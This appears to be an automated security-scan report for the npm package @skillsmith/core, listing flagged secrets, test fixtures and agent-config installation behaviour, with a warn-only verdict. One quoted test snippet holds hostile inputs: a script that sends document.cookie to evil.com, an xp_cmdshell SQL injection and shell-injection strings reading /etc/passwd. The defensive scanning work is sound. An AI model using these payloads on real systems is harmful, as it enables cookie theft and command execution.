registry  /  @skillsmith/core  /  0.11.0

@skillsmith/core@0.11.0

Core types and utilities for Skillsmith

AI Security Review

scanned 1h ago · by lpm-firewall-ai

LPM treats this as warn-only first-party agent extension lifecycle risk. No unconsented npm install-time attack surface was found. The package does contain explicit user-invoked agent extension installation that modifies AI-agent configs and hooks for Skillsmith integration.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Explicit call to installAgentPack or related CLI integration, not npm install/import alone
Impact
Adds Skillsmith MCP server and session hooks to supported local agent clients with backups and manifest tracking
Mechanism
first-party agent pack, hook, shim, and MCP config installation
Rationale
Source inspection supports a warning for explicit first-party AI-agent extension setup, not a publish block. Scanner critical hits are test fixtures or package-aligned optional/runtime features rather than concrete malicious behavior.
Evidence
package.jsondist/src/index.jsdist/src/install/agent-pack-installer.jsdist/src/install/agent-pack-installer.harness.jsdist/src/install/agent-pack-installer.entry.jsdist/src/install/agent-pack-uninstaller.jsdist/src/audit/remote-audit.jsdist/tests/security/pii-detection.test.jsdist/tests/edge-cases/EdgeCases.test.js~/.claude/skills/skillsmith-agent/SKILL.md~/.agents/skills/skillsmith-agent/SKILL.md~/.codex/config.toml~/.skillsmith/agent-install/manifest.json
Network endpoints1
api.skillsmith.app/functions/v1/events

Decision evidence

public snapshot
AI called this Suspicious at 84.0% confidence as Dangerous Capability with medium false-positive risk.
Evidence for warning
  • dist/src/install/agent-pack-installer.js implements explicit agent-pack installation across Claude, Cursor, Codex, Copilot, OpenCode, Hermes, and Windsurf.
  • dist/src/install/agent-pack-installer.harness.js writes hook scripts and merges MCP/hook/shim config into agent config files, including Codex TOML.
  • dist/src/install/agent-pack-installer.entry.js registers an MCP server command: npx -y @skillsmith/mcp-server.
  • dist/src/audit/remote-audit.js can send package-aligned telemetry to https://api.skillsmith.app/functions/v1/events when an API key exists and telemetry is not disabled.
Evidence against
  • package.json has no preinstall/install/postinstall hook; only prepublishOnly for publisher-side build/test.
  • dist/src/index.js is a barrel export and does not perform install-time or import-time mutation.
  • Scanner reverse-shell and secret hits are synthetic test fixtures in dist/tests/edge-cases/EdgeCases.test.js and dist/tests/security/pii-detection.test.js.
  • Dynamic require/import is limited to optional database drivers/WASM loading in dist/src/db/drivers/*.js.
  • Agent config mutation is exposed through explicit installAgentPack API, records backups/manifests, and has uninstall/path guards.
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsEvalFilesystemNativeBindingsNetworkShell
Supply chain
HighEntropyStringsTelemetryUrlStrings
ManifestNo manifest risk signals triggered.
scanned 673 file(s), 4.67 MB of source, external domains: 0.0.0.0, 0.0.0.1, 0.1.2.3, 0.255.255.255, 1.1.1.1, 1.2.3.4, 10.0.0.1, 10.1.2.3, 10.255.255.255, 127.0.0.1, 127.1.2.3, 127.255.255.255, 142.250.185.46, 169.254.0.1, 169.254.169.254, 169.254.255.255, 172.15.0.1, 172.16.0.1, 172.20.0.1, 172.31.255.255, 172.32.0.1, 192.167.0.1, 192.168.0.1, 192.168.1.1, 192.168.255.255, 192.169.0.1, 256.256.256.256, 8.8.8.8, 999.1.2.3, a.example, api.example.com, api.github.com, api.skillsmith.app, app.posthog.com, attacker.io, b.example, cdn.evil-example.net, ci.example.com, custom-domain.com, custom-internal.example.com, custom.api.example.com, custom.posthog.com, developer.mozilla.org, docs.anthropic.com, docs.example.com, evil-exfiltration-site.example.com, evil.com, evil.example, evil.example.com, evil.test

Source & flagged code

40 flagged · loading source
dist/tests/security/pii-detection.test.jsView file
35patternName = github_pat severity = critical line = 35 matchedText = const re...l');
Critical
Critical Secret

Package contains a critical-looking secret pattern.

dist/tests/security/pii-detection.test.jsView on unpkg · L35
35patternName = github_pat severity = critical line = 35 matchedText = const re...l');
Critical
Secret Pattern

GitHub personal access token in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L35
40patternName = aws_access_key severity = critical line = 40 matchedText = const re...E');
Critical
Secret Pattern

AWS access key ID in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L40
78patternName = private_key_rsa severity = critical line = 78 matchedText = const re...-');
Critical
Secret Pattern

RSA private key in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L78
112patternName = aws_access_key severity = critical line = 112 matchedText = 'aws_key...LE',
Critical
Secret Pattern

AWS access key ID in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L112
208patternName = aws_access_key severity = critical line = 208 matchedText = expect(l...ue);
Critical
Secret Pattern

AWS access key ID in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L208
86patternName = generic_password severity = medium line = 86 matchedText = const re..."');
Medium
Secret Pattern

Hardcoded password in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L86
160patternName = generic_password severity = medium line = 160 matchedText = .scan('t...p"')
Medium
Secret Pattern

Hardcoded password in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L160
167patternName = generic_password severity = medium line = 167 matchedText = .scan('t...e"')
Medium
Secret Pattern

Hardcoded password in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L167
dist/src/db/drivers/sqljsDriver.jsView file
178} L179: exec(sql) { L180: this.db.run(sql);
High
Child Process

Package source references child process execution.

dist/src/db/drivers/sqljsDriver.jsView on unpkg · L178
dist/src/telemetry/metric-helpers.jsView file
11try { L12: const importFn = new Function('m', 'return import(m)'); L13: return await importFn(moduleName);
Low
Eval

Package source references a known benign dynamic code generation pattern.

dist/src/telemetry/metric-helpers.jsView on unpkg · L11
dist/src/db/drivers/betterSqlite3Driver.jsView file
12// ESM-compatible require for native modules L13: const require = createRequire(import.meta.url); L14: /**
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/src/db/drivers/betterSqlite3Driver.jsView on unpkg · L12
dist/src/scripts/github-import/deduplication.jsView file
1/** L2: * SMI-860: Deduplication for imported skills
Low
Weak Crypto

Package source references weak cryptographic algorithms.

dist/src/scripts/github-import/deduplication.jsView on unpkg · L1
dist/tests/edge-cases/EdgeCases.test.jsView file
103it('should handle binary garbage in SKILL.md', () => { L104: const binaryGarbage = Buffer.from([0x00, 0x01, 0x02, 0xff, 0xfe, 0xfd]).toString(); L105: expect(() => parser.parse(binaryGarbage)).not.toThrow(); ... L371: "' OR ''='", L372: "'; EXEC xp_cmdshell('cmd.exe'); --", L373: '0x27204F52202731273D2731', // Hex encoded ... L434: '{{constructor.constructor("alert(1)")()}}', // Template injection L435: '<script>fetch("evil.com?cookie="+document.cookie)</script>', L436: '<input onfocus=alert(1) autofocus>', ... L542: '; ls -la', L543: '| cat /etc/passwd', L544: '`whoami`',
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

dist/tests/edge-cases/EdgeCases.test.jsView on unpkg · L103
dist/src/session/SessionManager.memory.jsView file
6* @see SMI-3600: Remove dead V3 dynamic imports (claude-flow → ruflo rename) L7: * @see SMI-3601: Migrate npx claude-flow CLI calls to npx ruflo L8: * ... L16: * L17: * SMI-674: Uses spawn() with argument array to prevent command injection L18: * SMI-3601: Migrated from claude-flow to ruflo
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

dist/src/session/SessionManager.memory.jsView on unpkg · L6
dist/src/scripts/github-import/github-auth.jsView file
50patternName = private_key_rsa severity = critical line = 50 matchedText = const is...-');
Critical
Secret Pattern

RSA private key in dist/src/scripts/github-import/github-auth.js

dist/src/scripts/github-import/github-auth.jsView on unpkg · L50
dist/src/api/utils.d.tsView file
53patternName = supabase_service_key severity = critical line = 53 matchedText = export d...t8";
Critical
Secret Pattern

Supabase service role key (JWT) in dist/src/api/utils.d.ts

dist/src/api/utils.d.tsView on unpkg · L53
dist/src/api/utils.jsView file
101patternName = supabase_service_key severity = critical line = 101 matchedText = export c...t8';
Critical
Secret Pattern

Supabase service role key (JWT) in dist/src/api/utils.js

dist/src/api/utils.jsView on unpkg · L101
dist/src/logging/redact.test.jsView file
13patternName = github_pat severity = critical line = 13 matchedText = const in...yz';
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L13
19patternName = github_fine_grained severity = critical line = 19 matchedText = const in...45';
Critical
Secret Pattern

GitHub fine-grained PAT in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L19
24patternName = github_oauth severity = critical line = 24 matchedText = const in...yz';
Critical
Secret Pattern

GitHub OAuth access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L24
29patternName = github_server_token severity = critical line = 29 matchedText = const in...yz';
Critical
Secret Pattern

GitHub server-to-server token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L29
34patternName = github_user_token severity = critical line = 34 matchedText = const in...yz';
Critical
Secret Pattern

GitHub user-to-server token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L34
54patternName = stripe_live_secret severity = critical line = 54 matchedText = const in...wx';
Critical
Secret Pattern

Stripe live secret key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L54
91patternName = aws_access_key severity = critical line = 91 matchedText = const in...LE';
Critical
Secret Pattern

AWS access key ID in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L91
111patternName = npm_token severity = critical line = 111 matchedText = const in...90';
Critical
Secret Pattern

npm access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L111
130patternName = supabase_service_key severity = critical line = 130 matchedText = const in...5c';
Critical
Secret Pattern

Supabase service role key (JWT) in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L130
174patternName = private_key_rsa severity = critical line = 174 matchedText = const in...----
Critical
Secret Pattern

RSA private key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L174
182patternName = private_key_rsa severity = critical line = 182 matchedText = const in...----
Critical
Secret Pattern

RSA private key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L182
202patternName = stripe_live_secret severity = critical line = 202 matchedText = const in...wx';
Critical
Secret Pattern

Stripe live secret key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L202
202patternName = github_pat severity = critical line = 202 matchedText = const in...wx';
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L202
208patternName = github_pat severity = critical line = 208 matchedText = const in...yz';
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L208
222patternName = github_pat severity = critical line = 222 matchedText = token: '...yz',
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L222
233patternName = stripe_live_secret severity = critical line = 233 matchedText = apiKey: ...wx',
Critical
Secret Pattern

Stripe live secret key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L233
243patternName = github_pat severity = critical line = 243 matchedText = const in...g'];
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L243
251patternName = github_pat severity = critical line = 251 matchedText = { key: '...' },
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L251
252patternName = stripe_live_secret severity = critical line = 252 matchedText = { key: '...' },
Critical
Secret Pattern

Stripe live secret key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L252
275patternName = github_pat severity = critical line = 275 matchedText = error: n...z'),
Critical
Secret Pattern

GitHub personal access token in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L275
59patternName = stripe_test_secret severity = high line = 59 matchedText = const in...wx';
High
Secret Pattern

Stripe test secret key in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L59
143patternName = generic_password severity = medium line = 143 matchedText = const in...3"';
Medium
Secret Pattern

Hardcoded password in dist/src/logging/redact.test.js

dist/src/logging/redact.test.jsView on unpkg · L143

Findings

30 Critical4 High8 Medium8 Low
CriticalCritical Secretdist/tests/security/pii-detection.test.js
CriticalReverse Shelldist/tests/edge-cases/EdgeCases.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/src/scripts/github-import/github-auth.js
CriticalSecret Patterndist/src/api/utils.d.ts
CriticalSecret Patterndist/src/api/utils.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
CriticalSecret Patterndist/src/logging/redact.test.js
HighChild Processdist/src/db/drivers/sqljsDriver.js
HighShell
HighRuntime Package Installdist/src/session/SessionManager.memory.js
HighSecret Patterndist/src/logging/redact.test.js
MediumDynamic Requiredist/src/db/drivers/betterSqlite3Driver.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
MediumSecret Patterndist/tests/security/pii-detection.test.js
MediumSecret Patterndist/tests/security/pii-detection.test.js
MediumSecret Patterndist/tests/security/pii-detection.test.js
MediumSecret Patterndist/src/logging/redact.test.js
LowNon Install Lifecycle Scripts
LowScripts Present
LowEvaldist/src/telemetry/metric-helpers.js
LowWeak Cryptodist/src/scripts/github-import/deduplication.js
LowFilesystem
LowHigh Entropy Strings
LowTelemetry
LowUrl Strings